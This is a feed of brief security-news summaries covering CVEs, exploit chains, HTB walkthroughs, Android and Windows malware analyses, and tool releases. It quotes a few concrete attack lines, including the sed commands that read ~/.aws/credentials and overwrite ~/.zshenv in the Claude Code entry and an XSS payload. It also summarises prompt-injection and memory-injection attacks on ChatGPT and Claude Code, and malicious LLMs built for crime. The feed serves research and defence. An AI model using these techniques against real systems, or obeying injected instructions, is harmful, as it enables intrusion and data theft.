#hacktricks-feed

🛡️ CVE | 💣 RCE | 🛠️ Tool | 🎁 PoC

🔗 Original article: https://www.offsec.com/blog/recent-vulnerabilities-in-wsus-service/

CVE-2025-59287 is a critical WSUS unsafe deserialization bug enabling unauthenticated RCE via forged AuthorizationCookie or SOAP reporting payloads. A public PoC posts a ReportEventBatch carrying a ysoserial.net gadget chain that triggers on WSUS console open, yielding SYSTEM. Affected servers require the Oct 23, 2025 OOB patches (KB5070881/82/83). Limit access to 8530/8531 and apply updates.

🌐 Web | 💣 RCE | 🎁 PoC | 🛠️ Tool

🔗 Original article: https://0xdf.gitlab.io/2025/11/04/htb-dump.html

HTB Dump: The web app shells to zip with user-controlled filenames, enabling zip option injection. Upload “-T” and “-TT <cmd>” files to run commands and get a www-data shell. Dump plaintext creds from SQLite to pivot to fritz. A lax sudoers rule for tcpdump allows extra flags (-w, -Z, -r, -V) to write root-owned files and a sudoers drop-in or leak secrets, yielding root.

🌐 Web | 🛡️ CVE | 🎭 Spoofing | 💬 Messaging

🔗 Original article: https://research.checkpoint.com/2025/microsoft-teams-impersonation-and-spoofing-vulnerabilities-exposed/

Researchers detail four Microsoft Teams flaws enabling undetectable edits, spoofed notification senders (CVE-2024-38197), 1:1 chat relabeling via the topic API, and forged caller IDs during call setup. Exploits hinge on trusting client-supplied fields like clientmessageid, imdisplayname, and participants.displayName. External guests or insiders can impersonate executives to phish or deliver malware. Microsoft patched them between May 8, 2024 and October 2025.

🛡️ CVE | 📱 Android | 🎮 GPU | 💣 RCE

🔗 Original article: https://xploitbengineer.github.io/CVE-2025-21479

CVE-2025-21479 is an Adreno A7xx microcode bug that masks the IB level with 0x3 instead of 0x7, collapsing SDS (IB4) to IB0. From SDS, attackers issue CP_SMMU_TABLE_UPDATE to a fake GPU pagetable and gain arbitrary kernel R/W using CP_MEM_WRITE/CP_MEM_TO_MEM. Samsung physical KASLR is brute-forced by scanning for _stext, then a dirty-pagetable pivot yields fast, stable kernel R/W to bypass SELinux and get root.

Web3 | Web

🔗 Original article: https://research.checkpoint.com/2025/how-an-attacker-drained-128m-from-balancer-through-rounding-error-exploitation/

High-level overview: a rounding/precision flaw in Balancer V2 stable-pool math enabled temporary BPT mispricing across networks; actionable exploit details are intentionally omitted.

🛡️ CVE | 📱 Android | 🧪 SQLi | 🎁 PoC

🔗 Original article: https://x.com/androidmalware2/status/1986022672472359017

CVE-2025-10184 lets any app on OxygenOS 12–15 exploit blind SQLi in OnePlus’s Telephony provider to dump SMS/MMS without READ_SMS. Exploit crafts a Boolean oracle via ContentResolver.update(where), using unicode(substr()) BETWEEN ranges, and can seed data using insert(). Confirmed URIs include service-number, push-mms, and push-shop. PoC APK (no permissions) extracts recent SMS. OnePlus patches began Oct 11, 2025; OPPO fix landed Nov 3, 2025.

🛠️ Tool | 🎁 PoC | 💣 RCE

🔗 Original article: https://github.com/frankheat/frida-jdwp-loader

Python 3 tool to inject Frida Gadget (or custom native libs) into debuggable Android apps over JDWP. It sets early breakpoints (Application.onCreate/Activity.onStart), supports spawn/attach, autonomous in‑process scripts, configurable listen address/port, ABI auto‑download, and custom library injection—no root or repackaging required.

📱 Android | 📶 NFC | 🛠️ Tool | 🎁 PoC

🔗 Original article: https://cert.pl/en/posts/2025/11/analiza-ngate/

NGate is an Android NFC relay kit. A sideloaded app runs in reader mode to capture EMV APDUs and PIN, then exfiltrates them via a cleartext, length‑prefixed TCP protocol to a C2/emitter at an ATM. Config is XOR‑encrypted in assets with a key = SHA‑256 of the APK signing cert. The APK also includes a payment‑category HCE service for the emitter role. Contains full wire format, JNI/XOR decryption, AIDs, PIN flow, and IOCs.

🛠️ Tool | 💣 RCE | 🏰 Active Directory | 🎁 PoC

🔗 Original article: https://www.synacktiv.com/en/publications/site-unseen-enumerating-and-attacking-active-directory-sites.html

The post shows how AD Sites can be enumerated and exploited via GPOs to obtain RCE on DCs. It adds Sites to BloodHound, abuses Site ACLs (GenericAll/GenericWrite/WriteGPLink) to relink or spoof gPLink, and provides PoCs using GroupPolicyBackdoor.py and OUned.py. It also details forest‑wide lateral movement by modifying the Configuration partition to link malicious GPOs, bypassing SID filtering.

🛠️ Tool | 📱 Android | 🎣 Phishing | 🕵️ Spyware

🔗 Original article: https://zimperium.com/blog/fantasy-hub-another-russian-based-rat-as-m-a-a-s

Zimperium details Fantasy Hub, a Russian MaaS Android RAT. A native dropper (metamask_loader) XOR‑decrypts assets/metadata.dat, zlib‑decompresses (windowBits=31), and deploys the payload. It abuses the default SMS role for 2FA interception, streams A/V via WebRTC, and uses activity‑alias + permissive WebView + JS bridge for banking overlays. Rich commands, HTTP C2, Telegram bot integration, and a self‑destruct make it potent. Full IoCs on GitHub.

🛡️ CVE | 💣 RCE | 📱 Android | 🕵️ Spyware

🔗 Original article: https://unit42.paloaltonetworks.com/landfall-is-new-commercial-grade-android-spyware/

Unit 42 exposes LANDFALL, commercial‑grade Android spyware delivered via malformed DNGs that exploit Samsung CVE‑2025‑21042 in libimagecodec.quram.so. The DNG embeds a ZIP that drops b.so (loader) and l.so (SELinux policy editor), enabling stealthy staging, broad permissions, and full surveillance. HTTPS C2 uses pinning and non‑standard ports. Activity ran mid‑2024–early 2025; Samsung patched in April 2025 (and a related DNG bug in Sept. 2025). IoCs, targeted models, config defaults, and C2 infrastructure are provided.

🛠️ Tool | 💣 RCE | 🎁 PoC

🔗 Original article: https://www.synacktiv.com/en/publications/site-unseen-enumerating-and-attacking-active-directory-sites

AD Sites can be abused via site-linked GPOs or by editing a Site’s gPLink. The post adds Site ACLs and edges to BloodHound, then shows two exploits: inject payloads into site-linked GPOs (GPB) and gPLink spoofing to attacker-hosted GPOs (OUned). Finally, it chains a child→root forest lateral move by modifying the forest-wide Configuration partition as DC SYSTEM. Critical impact; monitor gPLink/GPO changes.

🛠️ Tool | 🌐 Web

🔗 Original article: https://github.com/projectdiscovery/nuclei/releases/tag/v3.4.10

Nuclei v3.4.10 (2025-08-23) fixes a segmentation fault in the template caching logic (PR #6421), improving runtime stability. No CVEs or new features—this is a stability-only release. Verify with nuclei -version (v3.4.10).

🛠️ Tool | 🌐 Web

🔗 Original article: https://github.com/projectdiscovery/nuclei/releases/tag/v3.4.6

Nuclei v3.4.6 (2025-06-30) is a stability/quality release: fixes a flow context leak, log-level mismatch, hexdump output, and a headless last-URL bug; adds multiproto benchmarks plus build/docs updates. No CVEs or PoCs; recommended for long-running and headless scans.

🛠️ Tool | 🌐 Web

🔗 Original article: https://github.com/projectdiscovery/nuclei/releases/tag/v3.4.9

Nuclei v3.4.9 (Aug 22, 2025) fixes the output event for skipped hosts so pipelines can reliably detect and count skipped targets. Update your binary, verify with nuclei -version, and ensure your log/SIEM parsers handle the dedicated skipped-host event. Release includes 11 assets and PR #6415.

🛠️ Tool | 🌐 Web

🔗 Original article: https://github.com/projectdiscovery/nuclei/releases/tag/v3.4.7

Nuclei v3.4.7 is a maintenance release that fixes Go source installs by pinning github.com/zmap/zgrab2 from v0.2.0 to v0.1.8 (#6295). No scanning logic changes. Install with: go install github.com/projectdiscovery/nuclei/v3/cmd/nuclei@v3.4.7.

🧩 AD | 🔑 Kerberos | 💣 RCE | 🛠️ Tool

🔗 Original article: https://0xdf.gitlab.io/2025/11/08/htb-rustykey.html

Kerberos-only creds lead to AD graphing, unauth Timeroast to crack IT-COMPUTER3$, Helpdesk abuse to reset users, and Protected Objects removal to get Kerberos TGT/WinRM as bb.morgan. A 7‑Zip context-menu CLSID hijack (registry FullControl) gives a shell as mm.turner. With RBCD rights, impersonate backupadmin to obtain DA.

🛠️ Tool | 💣 RCE

🔗 Original article: https://github.com/CravateRouge/bloodyAD/wiki/User-Guide

bloodyAD is an AD attack/administration CLI that grants DCSync, configures RBCD, plants Shadow Credentials, edits ACLs/UAC, creates users/computers, and collects BloodHound data. It supports NTLM/Kerberos/PKINIT/Schannel, LDAPS, JSON output, DNS record injection, trust mapping, and writable-object discovery—enabling domain takeover paths.

Android | Windows | Web | APT | Account Abuse

🔗 Original article: https://www.genians.co.kr/en/blog/threat_intelligence/android

KONNI-linked actors combined credential theft with abuse of cloud device-management to reset phones and distract victims while Windows hosts deployed RATs and messengers were used to target more users.

📱 Android | 🕵️ APT | 🧵 Social Engineering | 🦠 Malware

🔗 Original article: https://www.genians.co.kr/en/blog/threat_intelligence/android

Windows MSI “Stress Clear.msi” dropped AutoIt loaders, scheduled task IoKlTr, and decrypted/injected QuasarRAT and RftRAT; RemcosRAT 7.0.4 Pro was also staged. Stolen Google creds let the actor use Find Hub to repeatedly factory‑reset Android devices while victims were away, then mass‑spread the MSI via the victims’ KakaoTalk PC. Full commands, paths, IOCs, and detection steps are provided.

🌐 Web | 🛠️ Tool | 💣 RCE

🔗 Original article: https://blog.kulkan.com/assessing-the-attack-surface-of-remote-mcp-servers-92d630a0cab0

Remote MCP servers (spec 2025‑06‑18) expose Prompts, Resources, and Tools over JSON‑RPC via SSE/streamable HTTP. Real risks mirror web APIs: LFI/SSRF and IDOR via Resources, and command injection→RCE via Tools. Use MCP Inspector for recon and NCC’s HTTP–MCP Bridge (SSE‑only) to proxy, replay, and fuzz JSON‑RPC (initialize, tools/list, resources/list, tool calls).

🌐 Web | 🛡️ CVE | 🛠️ Tool | 💰 Bug Bounty

🔗 Original article: https://www.praetorian.com/blog/how-i-found-the-worst-asp-net-vulnerability-a-10k-bug-cve-2025-55315/

CVE-2025-55315 is a Kestrel HTTP/1.1 request-smuggling bug via chunked transfer-encoding extensions. Kestrel accepts a lone \n in the chunk extension while many proxies treat it as a terminator, enabling TERM.EXT smuggling to bypass WAFs, hijack requests, and poison caches. Root cause: ParseExtension looked only for \r. Fix: validate both \r and \n; reject unpaired terminators; optional InsecureChunkedParsing switch. Patch and disclosure on 2025-10-14.

🛡️ CVE | 🛠️ Tool | 🎁 PoC | 💣 RCE

🔗 Original article: https://unit42.paloaltonetworks.com/authentication-coercion/

Windows authentication coercion abuses RPC methods with UNC parameters to force auto-authentication to attacker hosts. The article maps key interfaces (pipes, GUIDs, opnums), tools (PetitPotam, PrintNightmare, DFSCoerce, ShadowCoerce, CheeseOunce) and shows a 2025 case using MS-EVEN ElfrOpenBELW to steal/relay NTLM to AD CS and attempt DCSync. It provides concrete monitoring and RPC filtering mitigations.

🛠️ Tool | 🌐 Web | 💰 Bug Bounty

🔗 Original article: https://portswigger.net/research/introducing-http-anomaly-rank

PortSwigger’s HTTP Anomaly Rank (Burp 2025.10+, now in Turbo Intruder) auto-ranks HTTP responses by weighting stable attributes (e.g., status, word/line counts) and scoring rarity. It surfaces tiny, meaningful differences in noisy results. Turbo Intruder auto-sorts by Anomaly Rank post-attack; override with table.setSortOrder(). Useful for sifting huge batches and powering AI features.

🌐 Web | 🛠️ Tool | 🎁 PoC | 📱 Android

🔗 Original article: https://m4kr0x.medium.com/flutter-tls-bypass-how-to-intercept-https-traffic-when-all-other-frida-scripts-fail-bd3d04489088

The post shows a reliable Flutter TLS bypass by reversing libflutter.so, locating BoringSSL’s ssl_crypto_x509_session_verify_cert_chain, computing its per-build offset, and Frida-hooking it to always return true. Includes Ghidra steps, iptables routing check, x86_64 vs ARM caveats, and a working PoC.

🌐 Web | 🛡️ CVE | 💉 XSS | 🎁 PoC

🔗 Original article: https://labs.watchtowr.com/is-it-citrixbleed4-well-no-is-it-good-also-no-citrix-netscalers-memory-leak-rxss-cve-2025-12101/

Two NetScaler findings: a misconfiguration-driven memory leak when an AAA vServer exists but AAA isn’t enabled (WT-2025-0089, no CVE) and a reflected XSS in /cgi/logout via base64 RelayState newline/header injection (WT-2025-0090, CVE-2025-12101). A PoC sets Content-Type:text/html and reflects <svg/onload=alert(1)>. CSRF delivery is possible if a valid SAMLResponse is posted.

🛠️ Tool | 🌐 Web

🔗 Original article: https://blog.trailofbits.com/2025/11/13/building-checksec-without-boundaries-with-checksec-anywhere/

Checksec Anywhere is a browser‑based, fully local binary hardening analyzer for ELF, PE, and Mach‑O. Built in Rust (checksec.rs) and compiled to Wasm, it uses Goblin and iced_x86 for parsing/disassembly, supports drag‑and‑drop folders, color‑coded results, tabbed views, shareable static URLs, and local SARIF export. Fast, private, and extensible.

🌐 Web | 💣 RCE | 🛡️ CVE | 🎁 PoC

🔗 Original article: https://patchstack.com/articles/remote-code-execution-vulnerability-found-in-imunify360/

Imunify360 AV (Ai‑Bolit) < v32.7.4.0 executes attacker‑supplied functions during PHP deobfuscation. Because the wrapper always enables --deobfuscate, placing a crafted PHP file in a scanned path yields RCE via sinks like system/exec/eval. A PoC creates /tmp/l33t.txt. Impact can be full server takeover if the scanner runs as root. Patch adds a strict allow‑list of safe decoding functions. No CVE as of Nov 12, 2025.

🌐 Web | 🔓 Auth Bypass | 🎁 PoC | ⚠️ 0-day

🔗 Original article: https://www.rapid7.com/blog/post/etr-critical-vulnerability-in-fortinet-fortiweb-exploited-in-the-wild/

Rapid7 reports unauthenticated admin creation in FortiWeb, exploited since Oct 2025. Public PoC works on 8.0.1 (Aug 2025) but fails on 8.0.2. Success returns HTTP 200 with JSON for a new admin (e.g., prof_admin, 0.0.0.0/0, ::/0); failure on 8.0.2 returns 403. No CVE/advisory as of Nov 13, 2025. Mitigate by upgrading to 8.0.2 and removing public exposure. PoC link by Defused.

Android | SQLi | Data Exposure | AppSec

🔗 Original article: https://swarm.ptsecurity.com/injection-for-an-athlete/

High-level summary of provider misconfigurations and SQL injection risk that could expose user data on-device. Exploit details are omitted.

🌐 Web | 🛠️ Tool | 💣 RCE

🔗 Original article: https://unit42.paloaltonetworks.com/impersonation-campaigns-deliver-gh0st-rat/

Two 2025 campaigns delivered Gh0st RAT via brand‑impersonation sites. Campaign Trio used MSI CustomActions to launch a downloader that fetched/deobfuscated Gh0st. Campaign Chorus added cloud‑hosted payloads, an MSI‑embedded VBScript that reassembled/decrypted split fragments, and DLL side‑loading using signed wsc_proxy.exe + malicious wsc.dll. Persistence via Scheduled Tasks and Defender exclusions; encrypted C2 over TCP/8080.

🛠️ Tool | ⛓️ Web3

🔗 Original article: https://blog.trailofbits.com/2025/11/15/level-up-your-solidity-llm-tooling-with-slither-mcp/

Trail of Bits’ Slither-MCP exposes Slither’s Solidity static analysis to LLMs via MCP. It replaces brittle grep/read_file with deterministic source lookup, call-graph and inheritance queries, signature-to-implementation resolution, and detector runs. Includes one-line Claude setup and a Cursor config snippet. Licensed AGPLv3 with dual-licensing options for commercial web apps.

🛠️ Tool | 🎁 PoC | 🔐 Active Directory | 📨 LDAP

🔗 Original article: https://github.com/CravateRouge/bloodyAD

bloodyAD is a Python tool that executes low‑level LDAP operations for AD privesc. It supports cleartext, PTH, PTT, and certificate auth, works via SOCKS, and can run without LDAPS. Example: reset a user password using an NTLM hash with -p :<hash>. Features include DNS ops and shadow credentials. Built on MSLDAP/impacket; inspired by PowerView/adidnsdump/Powermad/pydsinternals.

🌐 Web | 🛡️ CVE | 💣 RCE | 🎁 PoC

🔗 Original article: https://0xdf.gitlab.io/2025/11/15/htb-outbound.html

HTB Outbound: Post-auth RCE in Roundcube 1.6.10 (CVE-2025-49113) via PHP deserialization yields www-data in a container. Dump Roundcube DB, decrypt 3DES session-stored IMAP passwords with des_key or bin/decrypt.sh, pivot to Jacob’s mailbox and recover new SSH creds. On the host, sudo-exposed below 0.8.0 CVE enables writable /etc/passwd and root.

🌐 Web | 🤖 LLM | 🛡️ Bypass | 🎁 PoC

🔗 Original article: https://www.tenable.com/blog/hackedgpt-novel-ai-vulnerabilities-open-the-door-for-private-data-leakage

Tenable details seven ChatGPT attack techniques: 0‑/1‑click and indirect prompt injection, a Bing redirector–based url_safe bypass, Conversation Injection to cross the SearchGPT→ChatGPT boundary, a markdown rendering bug for stealth, and Memory Injection for persistence—enabling phishing and private‑data exfiltration across ChatGPT 4o and 5.

🌐 Web | 🛡️ CVE | 🎁 PoC | 🛠️ Tool

🔗 Original article: https://labs.watchtowr.com/when-the-impersonation-function-gets-used-to-impersonate-users-fortinet-fortiweb-auth-bypass/

FortiWeb’s CVE‑2025‑64446 chains an API-path traversal with a header-based impersonation in fwbcgi. Sending CGIINFO (Base64 JSON) plus any valid JSON body reaches cgi_process() as the chosen user (e.g., admin), enabling arbitrary privileged actions. Versions prior to 8.0.2/7.6.5/7.4.10/7.2.12/7.0.12 and 6.4≤6.4.3/6.3≤6.3.23 are affected.

📱 Android | 🌐 Web | 🛰️ C2 | 🛡️ Threat Intel

🔗 Original article: https://www.d3lab.net/gpt-trade-fake-google-play-store-drops-btmob-spyware-and-uasecurity-miner-on-android-devices/

The post analyzes an Android campaign using a fake Google Play domain to distribute GPT Trade, a multi-stage dropper APK. GPT Trade shows a fake captcha while dynamically generating and installing two payloads: UASecurity Miner (persistent C2-driven backdoor) and BTMob spyware (full surveillance via extensive permissions). The dropper leverages the UASecurity Tools packer infrastructure and multiple C2 endpoints. The article provides detailed IoCs (hashes, domains, IPs, ports, package names) and explains the full attack chain from delivery to device takeover.

🛡️ CVE | 💣 RCE | 🌐 Web | 🛠️ Tool

🔗 Original article: https://blog.trailofbits.com/2025/11/18/we-found-cryptography-bugs-in-the-elliptic-library-using-wycheproof/

The post details two major cryptographic correctness bugs in the JavaScript elliptic library found via Wycheproof. CVE-2024-48949 is an EdDSA signature malleability issue caused by missing verification that s lies in [0, n), allowing alternate signatures s' ≡ s (mod n) for known message/signature pairs. CVE-2024-48948 affects ECDSA: converting hashes with leading zeros using BN shrinks their length, causing incorrect FIPS 186-5 truncation and probabilistic rejection of valid signatures (~2^-32). The article shows the exact vulnerable code, proposed fixes, and stresses continuous Wycheproof-based testing.

🌐 Web | 🛡️ CVE | 📡 IoT | 💰 Bug Bounty

🔗 Original article: https://github.com/sbaresearch/whatsapp-census

The paper in this repo shows how WhatsApp’s contact discovery API acted as a high-speed oracle for mapping phone numbers to accounts, enabling enumeration of >100M numbers/hour. Using global dialing tables, the authors build a WhatsApp census, correlate it with the 2021 Facebook leak, and uncover X25519 key reuse across accounts, revealing serious privacy risks. The repo provides the extended paper and dialing data, but no exploit code, and documents how Meta later hardened rate limiting and abuse detection.

📡 IoT | 🌐 Web | 💣 RCE | 🛠️ Tool

🔗 Original article: https://sensepost.com/blog/2025/noooooooooo-touch/

The post reverse-engineers a cheap IR no-touch exit sensor and shows how to spoof its ~30 kHz IR carrier using a custom flashlight-based IR "attack torch". By replaying the sensor’s post-detection carrier pattern in short bursts via a high-power IR LED and lens, the attacker can trigger the sensor’s relay from meters away, often via reflections off interior walls, thus opening access-controlled doors from outside. A custom ATtiny412-based PCB, MOSFET driver, vibration motor, and telescopic zoom lens turn a normal torch into a covert, field-ready physical access bypass tool.

🌐 Web | 💣 RCE | 🛡️ CVE | 🎁 PoC

🔗 Original article: https://www.hacktron.ai/blog/supapwn

SupaPwn is a chained exploit against a deprecated Supabase Cloud infra variant. A temporary SUPERUSER window in the postgres_fdw after‑create script plus supautils’ event‑trigger handling lets a tenant postgres user create a new SUPERUSER role (priv_esc) via malicious DDL event triggers. With SUPERUSER, the attacker uses pg_read_file and COPY ... TO PROGRAM to get a shell on the DB host, then abuses a misconfigured SUID binary for root. Orchestration credentials on the host finally give control over other customers’ instances in the same region.

🌐 Web | 🛡️ CVE | 💣 RCE | 🎁 PoC

🔗 Original article: https://bishopfox.com/blog/fortinet-fortiweb-authentication-bypass-cve-2025-64446

The blog dissects Fortinet FortiWeb CVE-2025-64446, a critical auth bypass where a single crafted POST uses a relative path traversal to hit the internal fwbcgi CGI and a forged Base64-encoded CGIINFO header to impersonate the built-in admin. A normal REST JSON body then creates a new super-admin account, yielding full WAF takeover and log erasure. Fortinet fixed it by hardening httpd.conf to block direct /cgi-bin/fwbcgi access. The post includes safe curl checks, an open-source Python scanner, and concrete patching and hardening advice.

📱 Mobile | 🌐 Web | 💣 RCE | 🛡️ Malware

🔗 Original article: https://www.threatfabric.com/blogs/sturnus-banking-trojan-bypassing-whatsapp-telegram-and-signal

Sturnus is an advanced Android banking trojan that combines WebView overlays, Accessibility‑based keylogging/UI‑tree monitoring, and VNC/HVNC remote control to steal banking credentials, unlock PINs, and fully control devices. It bypasses WhatsApp, Telegram, and Signal end‑to‑end encryption by reading decrypted message content from the UI. A hybrid RSA+AES C2 protocol over HTTP and WSS secures traffic, while Device Admin abuse and extensive environment monitoring provide strong persistence and anti‑removal, making Sturnus a high‑severity threat to financial and messaging privacy.

Web | RCE | CVE | PoC

🔗 Original article: https://medium.com/@1998satheesh/from-token-to-takeover-exploiting-weak-hs256-secrets-poc-c53afb9a75a0

The post describes how to exploit weak HS256 JWT secrets. After capturing a JWT, an attacker uses tools like Hashcat (mode 16500) or John the Ripper to brute-force the HS256 shared secret offline. With the recovered key, they modify privilege-bearing claims (role, sub, is_admin, exp) and re-sign tokens via libraries such as jsonwebtoken or PyJWT, achieving account takeover or admin access. It finishes with mitigations: strong random secrets, secure storage and rotation, preferring RS256/ES256, and enforcing server-side authorization checks instead of trusting JWT claims alone.

🌐 Web | 🛡️ AD/Kerberos | 💣 RCE | 🎁 PoC

🔗 Original article: https://0xdf.gitlab.io/2025/11/22/htb-mirage.html

The post chains multiple misconfigurations on HTB Mirage (Windows DC). An open NFS share leaks reports about NATS and DNS. Insecure AD DNS dynamic updates let the attacker hijack nats-svc.mirage.htb, impersonate a NATS server, and steal NATS creds. With NATS access, they enumerate JetStream, find an auth_logs stream containing plaintext AD creds for david.jjackson, then Kerberoast high-privilege user nathan.aadam and crack his TGS-REP hash. Later steps (not fully shown) use relay, GMSA secrets and AD CS ESC10 to reach Domain Admin.

📱 iOS | 💣 RCE | 🛡️ Sandbox | 🎁 PoC

🔗 Original article: https://hanakim3945.github.io/posts/download28_sbx_escape/

The blog explains a two‑stage iOS arbitrary file‑write primitive using itunesstored and bookassetd. A crafted downloads.28.sqlitedb makes itunesstored download a malicious BLDatabaseManager.sqlite into a Books system‑group container. That DB’s ZBLDOWNLOADINFO row uses a path‑traversal ZPLISTPATH plus a specially structured EPUB to make bookassetd write attacker‑controlled files into sensitive /private/var system‑group paths (e.g., com.apple.MobileGestalt.plist), enabling device “hactivation”. The post gives full SQL, paths, UUID discovery via pymobiledevice3, exact zip commands, AFC usage, and multi‑reboot orchestration, with a public PoC repo.

📱 Mobile | 🕵️ Malware | 📡 C2 | 🪤 RAT

🔗 Original article: https://www.certosoftware.com/insights/radzarat-new-android-trojan-disguised-as-file-manager-emerges-with-zero-detection-rate/

RadzaRat is an Android RAT disguised as a file manager, distributed as MaaS via GitHub and controlled through a Telegram bot backed by free Render.com hosting. It abuses Accessibility Services for keylogging, broad storage permissions for large-scale exfiltration (files up to ~10 GB), and strong persistence via boot receivers, Device Admin, foreground services, and battery-optimization bypass. The APK (signed with the default Android debug cert) had 0/66 detections on VirusTotal and uses HTTP endpoints (/upload, /upload_chunked) to send data to Telegram channels, posing high risk to both personal and enterprise Android devices.

🌐 Web | 💣 RCE | 🛡️ Supply Chain

🔗 Original article: https://www.tenable.com/blog/faq-about-sha1-hulud-2-0-the-second-coming-of-the-npm-supply-chain-campaign

The blog explains the Sha1-Hulud “Second Coming” npm supply-chain campaign. Attackers hijack real npm publisher accounts, modify package.json to add a preinstall script that runs setup_bun.js, which downloads the Bun runtime and executes a payload (e.g., bun_environment.js). Some variants attempt to wipe the user’s home directory or all writable files. Tens of thousands of repos and major integrations are affected. Tenable Nessus (plugin 265897) and Tenable Cloud Security detect malicious packages, and a GitHub list of ~800 affected packages enables audits and remediation.

🌐 Web | 🛠️ Tool | 💣 RCE | 💰 Bug Bounty

🔗 Original article: https://unit42.paloaltonetworks.com/dilemma-of-ai-malicious-llms/

The article dissects WormGPT 4 and KawaiiGPT as malicious LLMs intentionally stripped of safety constraints and trained or tuned on offensive datasets. It details how they are distributed (web, Telegram, GitHub) and how they generate full attack components: realistic phishing/BEC emails, PowerShell ransomware (AES‑256 over PDFs with Tor-based exfiltration), Python SSH lateral movement scripts using paramiko, and email exfiltration tools via os.walk + smtplib. These LLMs commoditize cybercrime, massively lowering skill and time barriers for ransomware, credential theft, and data theft operations.

🌐 Web | 🛡️ CVE | 💣 RCE | 🎁 PoC

🔗 Original article: https://specterops.io/blog/2025/11/21/an-evening-with-claude-code/

CVE-2025-64755 is a bug in Claude Code’s BashCommand tool where sed expressions are incompletely validated by regex-based checks. Carefully formatted sed commands like <code>echo 'runme' | sed 'w ~/.zshenv'</code> and <code>sed 'r ~/.aws/credentials'</code> bypass the <code>additionalSEDChecks</code> logic yet still write to or read arbitrary files. Via prompt injection or malicious MCP servers, an attacker can make Claude Code overwrite shell startup files for persistent RCE or exfiltrate secrets. The researcher found this by bypassing CLI anti-debugging, mapping <code>safeCommandsAndArgs</code>, and fuzzing the internal validator. Fixed in v2.0.31.

📱 Mobile | 🌐 Web | 🦠 Malware | 💳 NFC

🔗 Original article: https://cyble.com/blog/relaynfc-nfc-relay-malware-targeting-brazil/

RelayNFC is an Android malware family used for NFC relay fraud against Brazilian users. Delivered via phishing sites, it’s built with React Native and Hermes bytecode, hiding logic inside index.android.bundle and currently showing zero VirusTotal detections. Once installed, it reads EMV card data via NFC, phishes the PIN, and opens a WebSocket to C2 on port 3000 to relay APDUs in real time between the victim’s card and an attacker’s POS emulator. A related variant implements an HCE-based RelayHostApduService for card-emulation relay. The blog details JSON message formats, C2 infrastructure, IOCs, and MITRE mappings.

📱 Mobile | 🛡️ CVE | 🌐 Web | 💣 RCE

🔗 Original article: https://jgnr.ch/sites/android_enterprise.html

The post explains how to bypass CVE-2023-21257’s protections and install arbitrary apps into an Android Enterprise Work Profile on BYOD devices managed by Intune. By deploying via Android Studio with “install for all users” a malicious APK that shares the package name of a required Work Profile app but has a much higher versionCode, the attacker causes the legitimate app to be removed. Intune then triggers Finsky to reinstall the required app, which chooses the higher-version local APK and installs the attacker’s code into the Work Profile, enabling data exfiltration and per-app VPN hijack.

📱 iOS | 🧩 Reverse Engineering | 🧬 Frida | 🐞 LLDB

🔗 Original article: https://tonygo.tech/blog/2025/8ksec-ios-ctf-writeup

The post details how to attach LLDB to a jailbroken iPhone, locate a Swift jailbreak/Frida detection function (<code>systemSanityCheck()</code>), and bypass it by forcing its return value in <code>x0</code>. Then, using <code>frida-trace</code>, the author finds the mangled name of <code>dummyFunction(flag:)</code>, hooks it with Frida, analyzes the Swift String ABI on ARM64, and reads a heap-allocated <code>String</code> from <code>x1 + 32</code> to extract the flag <code>CTF{you_evaded_frida_detection}</code>.

🛡️ CVE | 🌐 Web | 💣 RCE | 🛠️ Tool

🔗 Original article: https://www.rapid7.com/blog/post/pt-metasploit-wrap-up-11-21-2025

Metasploit 6.4.99 adds a Fortinet FortiWeb module exploiting auth bypass CVE-2025-64446 to create admin accounts, enabling a chain with CVE-2025-58034 for root-level RCE. New Windows persistence modules provide service-based persistence via PowerShell/sc.exe and WSL-based persistence using Run/RunOnce registry keys. Additional enhancements improve ATT&CK mappings, clarify Linux CAP_SYS_BOOT needs, and add tests for socket channels, while bug fixes refine WinRM scanning, Meterpreter socket metadata, msfdb under bundle exec, and payload options. New docs cover post modules and the create_process API.

🌐 Web | 🛡️ CVE | 💣 RCE | 🎁 PoC

🔗 Original article: https://www.rapid7.com/blog/post/cve-2025-13315-cve-2025-13316-critical-twonky-server-authentication-bypass-not-fixed

Twonky Server 8.5.2 has a routing-based auth bypass (CVE-2025-13315) and hardcoded Blowfish password encryption (CVE-2025-13316). Admin-only RPCs like log_getfile require auth via /rpc, but are exposed unauthenticated via /nmc/rpc/log_getfile, leaking logs that contain the encrypted admin password. Passwords are stored as ||{HEX_INDEX}{HEX_CIPHERTEXT} using one of 12 static Blowfish keys embedded in twonkyserver, allowing trivial decryption. A Metasploit module chains log leakage and decryption to recover admin credentials. No patch exists; Twonky should be isolated and credentials treated as compromised.

🛡️ CVE | 💣 RCE | 🌐 Web

🔗 Original article: https://www.rapid7.com/blog/post/tr-building-construction-sector-threat-landscape-ransomware

The post explains why construction is a top ransomware target in 2025 and maps that risk to concrete CVEs exploited for initial access and RCE. It highlights SAP NetWeaver Visual Composer file upload (CVE‑2025‑31324), Ivanti command injection (CVE‑2024‑21887), Fortinet FortiOS/FortiProxy auth bypass and RCE flaws (CVE‑2024‑21762, CVE‑2024‑55591), Veeam Backup deserialization RCE (CVE‑2024‑40711), and SonicWall improper access control (CVE‑2024‑40766), then ties them to the sector’s time‑sensitive projects, complex supply chains, IoT growth, and low cyber maturity.

🛡️ CVE | 💣 RCE | 🌐 Web | 🛠️ Tool

🔗 Original article: https://www.rapid7.com/blog/post/pt-metasploit-wrap-up-11-14-2025

The post introduces a Metasploit module for CVE-2025-59287, an unauthenticated WSUS deserialization vulnerability enabling SYSTEM-level RCE via HTTP(S) using windows/http/wsus_deserialization_rce. It also refactors the LINQPad persistence module to use the persistence mixin, enhances the Azure AD login scanner to show domain and username in errors, and extends the SMB pipe auditor to probe the cert pipe for AD CS/MS-ICPR detection. Documentation is standardized, and instructions are provided for updating or installing Metasploit.

🛡️ CVE | 🌐 Web | 💣 RCE | 🎁 PoC

🔗 Original article: https://www.rapid7.com/blog/post/etr-critical-vulnerability-in-fortinet-fortiweb-exploited-in-the-wild

The post analyzes active exploitation of Fortinet FortiWeb CVE-2025-64446 (critical unauthenticated admin takeover) and CVE-2025-58034 (authenticated command injection). It shows how successful vs failed exploitation looks at the HTTP level (200 JSON with a new admin user vs 403 Forbidden), lists all affected and fixed versions, and stresses emergency mitigations like disabling internet-facing HTTP/HTTPS management. Rapid7 provides an unauthenticated InsightVM/Nexpose check, a Metasploit module (🎁 PoC), Sigma rule, and IOCs, and notes both CVEs are in CISA KEV and exploited in the wild.

🌐 Web | 🛡️ CVE | 🛠️ Tool

🔗 Original article: https://projectdiscovery.io/blog/how-to-research-web-vulnerabilities

